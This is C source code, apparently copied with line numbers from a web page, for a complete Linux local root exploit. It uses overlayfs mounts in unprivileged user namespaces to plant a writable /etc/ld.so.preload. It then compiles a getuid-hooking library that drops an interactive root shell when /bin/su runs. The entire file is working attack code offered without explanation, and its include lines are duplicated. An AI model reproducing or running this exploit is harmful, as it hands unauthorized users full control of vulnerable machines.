#include <stdio.h>#include <stdlib.h>#include <unistd.h>#include <sched.

1.  
2. #include <stdio.h>
3. #include <stdlib.h>
4. #include <unistd.h>
5. #include <sched.h>
6. #include <sys/stat.h>
7. #include <sys/types.h>
8. #include <sys/mount.h>
9. #include <stdio.h>
10. #include <stdlib.h>
11. #include <unistd.h>
12. #include <sched.h>
13. #include <sys/stat.h>
14. #include <sys/types.h>
15. #include <sys/mount.h>
16. #include <sys/types.h>
17. #include <signal.h>
18. #include <fcntl.h>
19. #include <string.h>
20. #include <linux/sched.h>
21.  
22. #define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"
23.  
24. static char child_stack[1024*1024];
25.  
26. static int
27. child_exec(void *stuff)
28. {
29. char *file;
30. system("rm -rf /tmp/ns_sploit");
31. mkdir("/tmp/ns_sploit", 0777);
32. mkdir("/tmp/ns_sploit/work", 0777);
33. mkdir("/tmp/ns_sploit/upper",0777);
34. mkdir("/tmp/ns_sploit/o",0777);
35.  
36. fprintf(stderr,"mount #1\n");
37. if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
38. // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
39. if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
40. fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
41. exit(-1);
42. }
43. file = ".access";
44. chmod("/tmp/ns_sploit/work/work",0777);
45. } else file = "ns_last_pid";
46.  
47. chdir("/tmp/ns_sploit/o");
48. rename(file,"ld.so.preload");
49.  
50. chdir("/");
51. umount("/tmp/ns_sploit/o");
52. fprintf(stderr,"mount #2\n");
53. if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
54. if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
55. exit(-1);
56. }
57. chmod("/tmp/ns_sploit/work/work",0777);
58. }
59.  
60. chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
61. umount("/tmp/ns_sploit/o");
62. }
63.  
64. int
65. main(int argc, char **argv)
66. {
67. int status, fd, lib;
68. pid_t wrapper, init;
69. int clone_flags = CLONE_NEWNS | SIGCHLD;
70.  
71. fprintf(stderr,"spawning threads\n");
72.  
73. if((wrapper = fork()) == 0) {
74. if(unshare(CLONE_NEWUSER) != 0)
75. fprintf(stderr, "failed to create new user namespace\n");
76.  
77. if((init = fork()) == 0) {
78. pid_t pid =
79. clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
80. if(pid < 0) {
81. fprintf(stderr, "failed to create new mount namespace\n");
82. exit(-1);
83. }
84.  
85. waitpid(pid, &status, 0);
86.  
87. }
88.  
89. waitpid(init, &status, 0);
90. return 0;
91. }
92.  
93. usleep(300000);
94.  
95. wait(NULL);
96.  
97. fprintf(stderr,"child threads done\n");
98.  
99. fd = open("/etc/ld.so.preload",O_WRONLY);
100.  
101. if(fd == -1) {
102. fprintf(stderr,"exploit failed\n");
103. exit(-1);
104. }
105.  
106. fprintf(stderr,"/etc/ld.so.preload created\n");
107. fprintf(stderr,"creating shared library\n");
108. lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
109. write(lib,LIB,strlen(LIB));
110. close(lib);
111. lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
112. if(lib != 0) {
113. fprintf(stderr,"couldn't create dynamic library\n");
114. exit(-1);
115. }
116. write(fd,"/tmp/ofs-lib.so\n",16);
117. close(fd);
118. system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
119. execl("/bin/su","su",NULL);
120. }